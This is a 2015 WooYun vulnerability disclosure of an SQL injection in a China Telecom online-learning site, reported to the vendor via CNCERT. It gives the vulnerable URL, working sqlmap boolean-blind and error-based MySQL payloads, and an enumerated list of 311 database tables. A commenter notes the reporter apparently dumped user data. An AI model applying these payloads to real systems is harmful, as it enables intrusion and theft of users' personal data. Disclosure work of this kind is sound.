当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106945

漏洞标题:中国电信某站SQL注入漏洞(涉及大量用户敏感信息)

相关厂商:中国电信

漏洞作者: 几何黑店

提交时间:2015-04-09 21:13

修复时间:2015-05-29 08:46

公开时间:2015-05-29 08:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-14: 厂商已经确认,细节仅向厂商公开
2015-04-24: 细节向核心白帽子及相关领域专家公开
2015-05-04: 细节向普通白帽子公开
2015-05-14: 细节向实习白帽子公开
2015-05-29: 细节向公众公开

简要描述:

中国电信某站SQL注入漏洞(涉及89万用户信息)

详细说明:

www.myctu.cn
中国电信网上大学

QQ图片20150409210327.png


http://circle.myctu.cn/api.php?app=userauth:api&mod=plugin&param=uid%3D0&random=0.5043484827037901&_=1428579086625


---
Parameter: param (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=userauth:api&mod=plugin&param=uid=0 RLIKE (SELECT (CASE WHEN (2544=2544) THEN 0x75696425334430 ELSE 0x28 END))&random=0.5043484827037901&_=1428579086625
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=userauth:api&mod=plugin&param=uid=0 AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7162707071,(SELECT (ELT(6137=6137,1))),0x7170627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&random=0.5043484827037901&_=1428579086625
---
web application technology: Nginx, PHP 5.3.20
back-end DBMS: MySQL 5.0
available databases [2]:
[*] forum
[*] information_schema


---
Parameter: param (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=userauth:api&mod=plugin&param=uid=0 RLIKE (SELECT (CASE WHEN (2544=2544) THEN 0x75696425334430 ELSE 0x28 END))&random=0.5043484827037901&_=1428579086625
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=userauth:api&mod=plugin&param=uid=0 AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7162707071,(SELECT (ELT(6137=6137,1))),0x7170627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&random=0.5043484827037901&_=1428579086625
---
web application technology: Nginx, PHP 5.3.20
back-end DBMS: MySQL 5.0
Database: forum
[311 tables]
+------------------------------------+
| fujian |
| guangdong |
| lt_notice_ignore |
| lt_notice_log |
| lt_system_msg |
| pre_admincp_plaza |
| pre_authenticated_users |
| pre_blog_tag |
| pre_click_stats |
| pre_commmon_config |
| pre_common_addon |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_adminsession |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_item |
| pre_common_block_item_archive |
| pre_common_block_permission |
| pre_common_block_style |
| pre_common_cache |
| pre_common_category |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_district |
| pre_common_diy_data |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_group_plugin |
| pre_common_invite |
| pre_common_log |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_count |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_stat_fieldcache |
| pre_common_member_stat_search |
| pre_common_member_stat_searchcache |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_plugin |
| pre_common_plugin_category |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_report |
| pre_common_resource |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_share_log |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_user_at |
| pre_common_user_tag |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_courses |
| pre_doc |
| pre_doc_click |
| pre_doc_cover |
| pre_doc_item |
| pre_entrance |
| pre_exam |
| pre_exam_answer |
| pre_exam_question |
| pre_expertuser |
| pre_extra_class |
| pre_extra_compare |
| pre_extra_lecture |
| pre_extra_org |
| pre_extra_relationship |
| pre_extra_resource |
| pre_extrastar |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activity_select |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachmentfield |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_activity |
| pre_forum_forum_lecturer |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupranking |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_labelgroup |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_category |
| pre_forum_post_tableid |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_postposition |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_repeats |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_thread |
| pre_forum_threadclass |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_userlevel |
| pre_forum_warning |
| pre_global_relation |
| pre_group_album |
| pre_group_course |
| pre_group_doc |
| pre_group_empirical |
| pre_group_empirical_log |
| pre_group_empirical_values |
| pre_group_live |
| pre_group_pic |
| pre_group_picfield |
| pre_group_share |
| pre_groupad |
| pre_groupdoc_log |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_attachment |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_countpraise |
| pre_home_doc_class |
| pre_home_docomment |
| pre_home_doing |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_feedpraise |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_media |
| pre_home_notification |
| pre_home_notification_visit |
| pre_home_nwkt |
| pre_home_nwkt_class |
| pre_home_official_link |
| pre_home_pic |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_sharelog |
| pre_home_show |
| pre_home_specialuser |
| pre_home_tag |
| pre_home_tagrelation |
| pre_home_user_tongzhi |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_viewlog |
| pre_home_visitor |
| pre_larnsouce_harvestoption |
| pre_learn_attachment |
| pre_learn_credit |
| pre_learncredit_record |
| pre_learning_apply_record |
| pre_learning_coach |
| pre_learning_excitation |
| pre_lecture_record |
| pre_lecturer |
| pre_lecturerecord_credit |
| pre_member_notice |
| pre_notice |
| pre_notice_type |
| pre_notice_userstands |
| pre_opinion_reply |
| pre_pic_tag |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_hotspot |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_protal_ignore |
| pre_province_level |
| pre_questionary |
| pre_questionary_class |
| pre_questionary_question |
| pre_questionary_questionchoicers |
| pre_questionary_questionoption |
| pre_repeats_relation |
| pre_resourcelist |
| pre_sc_record |
| pre_sc_relation |
| pre_sc_station |
| pre_sc_ustation |
| pre_selection |
| pre_selection_option |
| pre_selection_record |
| pre_selection_user_vote_num |
| pre_share_province |
| pre_sharesource |
| pre_shlecture |
| pre_shlecture_direct |
| pre_shlecture_stars |
| pre_shresourcelist |
| pre_station |
| pre_station_course |
| pre_suggestbox |
| pre_synchro_cert_info |
| pre_train_course |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pms |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
| pre_user_courses |
| pre_user_station |
| resouce_mapping |
| sichuan |
| user_group |
| user_map |
| user_sync_timestamp |
| userlogin |
| yunnan |
+------------------------------------+

漏洞证明:

QQ图片20150409205101.png

修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-14 08:45

厂商回复:

CNVD确认所述漏洞风险,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-10 00:13 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    厉害!

  2. 2015-05-29 09:32 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    从截图看,黑客你这是在用--dump脱裤啊!查记录数为毛不用--count???